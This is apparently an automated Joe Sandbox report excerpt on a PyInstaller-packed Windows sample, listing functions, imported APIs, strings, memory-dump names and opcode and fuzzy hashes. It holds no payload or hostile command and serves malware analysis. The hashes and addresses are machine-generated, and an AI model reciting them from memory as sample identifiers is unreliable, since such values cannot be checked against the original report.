Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
Instruction Fuzzy Hash: 81F0820CF8C24F61FE5477A159932B5D2909F84B61FC807B8DE2E862C1DDACE440A330

Function 00007FF73AE27DEC Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE27E05

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction ID: 8544e02b8f07b61f99bb7c7b811476e16c352fd30f8829b6be4e221330f28b1c
Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction Fuzzy Hash: 07E0EC6CE8930E62FA15BAA04A831B9E2204F55342FC444BCDA194A2D3EE1C6C557632

Function 00007FF73AE183E0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 24b2c4150c1d5606f670cbde58673d25452eaf2973990e0a8e410a01c1b9a188
Instruction ID: 7b223e1567642d96d7edc357184de44fd76ccf651ede5e5846b50f44c2f7ce6b
Opcode Fuzzy Hash: 24b2c4150c1d5606f670cbde58673d25452eaf2973990e0a8e410a01c1b9a188
Instruction Fuzzy Hash: 8D41A81AE5C69551F611BB24D5032FCA360FBA5744F8462B2DB8D42153EF2CA6C8D310

Non-executed Functions

Function 00007FF73AE151E0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE151F0
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE1522A
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE1524F
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE15274
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE1529C
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE152C4
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE152EC
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE15314
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE1533C
GetProcAddress.KERNEL32(?,?,00000000,00007FF73AE1346E), ref: 00007FF73AE15364

Strings

Py_InitializeFromConfig, xrefs: 00007FF73AE15292
GetProcAddress, xrefs: 00007FF73AE15209
Failed to get address for PyModule_GetDict, xrefs: 00007FF73AE1561E
PyErr_NormalizeException, xrefs: 00007FF73AE1544A
PyUnicode_FromString, xrefs: 00007FF73AE1585A
Failed to get address for PyConfig_SetBytesString, xrefs: 00007FF73AE1539E
PyImport_ImportModule, xrefs: 00007FF73AE15562
Failed to get address for PyEval_EvalCode, xrefs: 00007FF73AE15506
Failed to get address for PySys_SetObject, xrefs: 00007FF73AE157AE
PySys_SetObject, xrefs: 00007FF73AE15792
PyObject_CallFunction, xrefs: 00007FF73AE1562A
PyConfig_SetString, xrefs: 00007FF73AE153AA
PyErr_Clear, xrefs: 00007FF73AE153FA
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF73AE156BE
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF73AE155CE
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF73AE157D6
PyErr_Restore, xrefs: 00007FF73AE154C2
Py_DecodeLocale, xrefs: 00007FF73AE15220
PyEval_EvalCode, xrefs: 00007FF73AE154EA
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF73AE1584E
PyConfig_Clear, xrefs: 00007FF73AE1530A
PyErr_Fetch, xrefs: 00007FF73AE15422
PyObject_GetAttrString, xrefs: 00007FF73AE1567A
PyConfig_InitIsolatedConfig, xrefs: 00007FF73AE15332
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF73AE156F2
PyUnicode_AsUTF8, xrefs: 00007FF73AE157BA
Failed to get address for PyErr_Fetch, xrefs: 00007FF73AE1543E
PyList_Append, xrefs: 00007FF73AE1558A
Failed to get address for Py_IsInitialized, xrefs: 00007FF73AE152D6
Failed to get address for PyUnicode_Replace, xrefs: 00007FF73AE158C6
Failed to get address for PyConfig_Read, xrefs: 00007FF73AE15376
PyRun_SimpleStringFlags, xrefs: 00007FF73AE1571A
Failed to get address for PyErr_Clear, xrefs: 00007FF73AE15416
Failed to get address for PyErr_Restore, xrefs: 00007FF73AE154DE
PyUnicode_Replace, xrefs: 00007FF73AE158AA
PyConfig_SetBytesString, xrefs: 00007FF73AE15382
PyConfig_Read, xrefs: 00007FF73AE1535A
Failed to get address for Py_InitializeFromConfig, xrefs: 00007FF73AE152AE
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF73AE1566E
PyUnicode_DecodeFSDefault, xrefs: 00007FF73AE1580A
PyObject_Str, xrefs: 00007FF73AE156CA
PyImport_ExecCodeModule, xrefs: 00007FF73AE1553A
Py_PreInitialize, xrefs: 00007FF73AE152E2
Failed to get address for PyErr_Print, xrefs: 00007FF73AE154B6
Failed to get address for PyImport_ImportModule, xrefs: 00007FF73AE1557E
PySys_GetObject, xrefs: 00007FF73AE1576A
Failed to get address for PyUnicode_FromString, xrefs: 00007FF73AE15876
Failed to get address for Py_Finalize, xrefs: 00007FF73AE15286
Failed to get address for PyImport_AddModule, xrefs: 00007FF73AE1552E
PyUnicode_Decode, xrefs: 00007FF73AE157E2
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF73AE15696
Failed to get address for Py_DecodeLocale, xrefs: 00007FF73AE1523C
PyMem_RawFree, xrefs: 00007FF73AE155DA
Failed to get address for PyConfig_SetString, xrefs: 00007FF73AE153C6
Failed to get address for PyConfig_InitIsolatedConfig, xrefs: 00007FF73AE1534E
PyImport_AddModule, xrefs: 00007FF73AE15512
Failed to get address for PyErr_Occurred, xrefs: 00007FF73AE1548E
Failed to get address for PyUnicode_Decode, xrefs: 00007FF73AE157FE
PyUnicode_Join, xrefs: 00007FF73AE15882
Failed to get address for PyStatus_Exception, xrefs: 00007FF73AE1575E
Failed to get address for PyUnicode_Join, xrefs: 00007FF73AE1589E
Failed to get address for PyObject_Str, xrefs: 00007FF73AE156E6
PyErr_Occurred, xrefs: 00007FF73AE15472
Py_IsInitialized, xrefs: 00007FF73AE152BA
PyUnicode_FromFormat, xrefs: 00007FF73AE15832
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF73AE15826
Failed to get address for PyMem_RawFree, xrefs: 00007FF73AE155F6
PyMarshal_ReadObjectFromString, xrefs: 00007FF73AE155B2
PyObject_CallFunctionObjArgs, xrefs: 00007FF73AE15652
PyErr_Print, xrefs: 00007FF73AE1549A
Py_Finalize, xrefs: 00007FF73AE1526A
Py_ExitStatusException, xrefs: 00007FF73AE15245
Failed to get address for PyObject_CallFunction, xrefs: 00007FF73AE15646
Failed to get address for PyPreConfig_InitIsolatedConfig, xrefs: 00007FF73AE1570E
Failed to get address for PyConfig_Clear, xrefs: 00007FF73AE15326
Failed to get address for PyConfig_SetWideStringList, xrefs: 00007FF73AE153EE
PyStatus_Exception, xrefs: 00007FF73AE15742
Failed to get address for Py_PreInitialize, xrefs: 00007FF73AE152FE
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF73AE15556
Failed to get address for PySys_GetObject, xrefs: 00007FF73AE15786
PyObject_SetAttrString, xrefs: 00007FF73AE156A2
Py_DecRef, xrefs: 00007FF73AE151E6
Failed to get address for Py_ExitStatusException, xrefs: 00007FF73AE15261
Failed to get address for PyList_Append, xrefs: 00007FF73AE155A6
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF73AE15466
PyConfig_SetWideStringList, xrefs: 00007FF73AE153D2
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF73AE15736
Failed to get address for Py_DecRef, xrefs: 00007FF73AE15202
PyModule_GetDict, xrefs: 00007FF73AE15602

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-4266016200
Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
Instruction ID: d7640305df51794c30c074dc39ca86e62bbc347124fa052c5da771a1cc02f081
Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
Instruction Fuzzy Hash: 9012A76DE8AB23B0FA55BB18E857174A3B5AF44B40BC454F5C82E06394EF7DE548E230

Function 00007FF73AE11F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF73AE11F9E
MulDiv.KERNEL32 ref: 00007FF73AE11FB2
MulDiv.KERNEL32 ref: 00007FF73AE11FD3
SystemParametersInfoW.USER32 ref: 00007FF73AE1201B
CreateFontIndirectW.GDI32 ref: 00007FF73AE1202F
#380.COMCTL32 ref: 00007FF73AE12053
CreateWindowExW.USER32 ref: 00007FF73AE120A6
CreateWindowExW.USER32 ref: 00007FF73AE12100
CreateWindowExW.USER32 ref: 00007FF73AE1215D
CreateWindowExW.USER32 ref: 00007FF73AE121BF
SendMessageW.USER32 ref: 00007FF73AE121DF
SendMessageW.USER32 ref: 00007FF73AE121F9
SendMessageW.USER32 ref: 00007FF73AE12218
SendMessageW.USER32 ref: 00007FF73AE12237
SendMessageW.USER32 ref: 00007FF73AE12255
SendMessageW.USER32 ref: 00007FF73AE12273
SendMessageW.USER32 ref: 00007FF73AE12291
SendMessageW.USER32 ref: 00007FF73AE122A9
SendMessageW.USER32 ref: 00007FF73AE122C1
GetClientRect.USER32 ref: 00007FF73AE122D0

Part of subcall function 00007FF73AE123F0: GetDC.USER32 ref: 00007FF73AE1241B
Part of subcall function 00007FF73AE123F0: SelectObject.GDI32 ref: 00007FF73AE12462
Part of subcall function 00007FF73AE123F0: DrawTextW.USER32 ref: 00007FF73AE12485
Part of subcall function 00007FF73AE123F0: SelectObject.GDI32 ref: 00007FF73AE1249B
Part of subcall function 00007FF73AE123F0: ReleaseDC.USER32 ref: 00007FF73AE124AB
Part of subcall function 00007FF73AE123F0: MoveWindow.USER32 ref: 00007FF73AE124FB
Part of subcall function 00007FF73AE123F0: MoveWindow.USER32 ref: 00007FF73AE1253B
Part of subcall function 00007FF73AE123F0: MoveWindow.USER32 ref: 00007FF73AE1258E

Strings

BUTTON, xrefs: 00007FF73AE12176
Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF73AE11F7D
STATIC, xrefs: 00007FF73AE1205C, 00007FF73AE120B1
Close, xrefs: 00007FF73AE12168
EDIT, xrefs: 00007FF73AE1210B

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction ID: 9c0ec317c2ea325c16af9625983db9644d0e256cd05690878e778d5bfd65b82a
Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction Fuzzy Hash: 29A18B3A608B85A7E714AF12E45679AB360F788B84F904125DB9E03B64DF7EE164CB10

Function 00007FF73AE3471C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF73AE3476A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE34DD6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE34F4C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE3520A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE3542A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35667
memcpy_s.LIBCPMT ref: 00007FF73AE35742
memcpy_s.LIBCPMT ref: 00007FF73AE357ED
memcpy_s.LIBCPMT ref: 00007FF73AE358BC

Strings

1#SNAN, xrefs: 00007FF73AE3487A
1#IND, xrefs: 00007FF73AE34857
1#INF, xrefs: 00007FF73AE34893
1#QNAN, xrefs: 00007FF73AE34883

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
Instruction ID: 0e8d9d728f414f25d98c701e053dacbc346afcb4869883b23bb4d56974f2e3e6
Opcode Fuzzy Hash: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
Instruction Fuzzy Hash: 08B22177E582829BF725AE24C4437FCB3A1FB50B89F801175DA1A57BC4DB39E9009B60

Function 00007FF73AE18560 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF73AE12A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE18587
FormatMessageW.KERNEL32 ref: 00007FF73AE185B6
WideCharToMultiByte.KERNEL32 ref: 00007FF73AE1860C

Part of subcall function 00007FF73AE129E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
Part of subcall function 00007FF73AE129E0: MessageBoxW.USER32 ref: 00007FF73AE12AF0

Strings

PyInstallem: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF73AE18629
WideCharToMultiByte, xrefs: 00007FF73AE1861D
FormatMessageW, xrefs: 00007FF73AE185C7
PyInstallem: FormatMessageW failed., xrefs: 00007FF73AE185D3
No error messages generated., xrefs: 00007FF73AE185C0
Failed to encode wchar_t as UTF-8., xrefs: 00007FF73AE18616

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-3505189403
Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
Instruction ID: 8d6dcccf1453b78801e368f19ac3148567b5ec1be63d380d8cee44f4fe7d55d4
Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
Instruction Fuzzy Hash: 6021A138A58A42A1F720BB11E893265A364FF88784FC401B5E64D836E4EF3CD105E720

Function 00007FF73AE1C57C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF73AE1C598
RtlCaptureContext.KERNEL32 ref: 00007FF73AE1C5C5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF73AE1C5DF
RtlVirtualUnwind.KERNEL32 ref: 00007FF73AE1C620
IsDebuggerPresent.KERNEL32 ref: 00007FF73AE1C674
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF73AE1C695
UnhandledExceptionFilter.KERNEL32 ref: 00007FF73AE1C6A0

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
Instruction ID: 3a68d51178e6d750348ce81551c10833faf2a5a834e72c8636c8ce1b9084e8aa
Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
Instruction Fuzzy Hash: D8318076A08B9196FB60AF60E8423EDB364FB84744F80407ADB4E47A94DF38C648C720

Function 00007FF73AE2ABD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF73AE2AC51
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF73AE2AC69
RtlVirtualUnwind.KERNEL32 ref: 00007FF73AE2ACA4
IsDebuggerPresent.KERNEL32 ref: 00007FF73AE2ACDD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF73AE2ACE7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF73AE2ACF2

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
Instruction ID: d1c0999bfeeb4ff26015a5513bc68c50201dea3c89db0736b2bf0fa5ab3b1736
Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
Instruction Fuzzy Hash: EC31A436A58B8196EB60FF24E8422AEB3A4FB88754F900175EA8D43B94DF3CD145CB10

Function 00007FF73AE31EE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE31F30
FindFirstFileExW.KERNEL32 ref: 00007FF73AE3203A

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
Instruction ID: 4942ba5c54bef0dbdcc31a82b268b02d12176caa1ca138402fb5ee1b2b2ce030
Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
Instruction Fuzzy Hash: 09B1E12AF9868651FA64BB2599031B9E390EF54FD0F844175EA9E07BC8DF3DE441E320

Function 00007FF73AE1C460 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF73AE1C48C
GetCurrentThreadId.KERNEL32 ref: 00007FF73AE1C49A
GetCurrentProcessId.KERNEL32 ref: 00007FF73AE1C4A6
QueryPerformanceCounter.KERNEL32 ref: 00007FF73AE1C4B6

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
Instruction ID: 66366597197aa3bfbc06ef897cd253dda5f272010675b4f4aa49dfb94212be02
Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
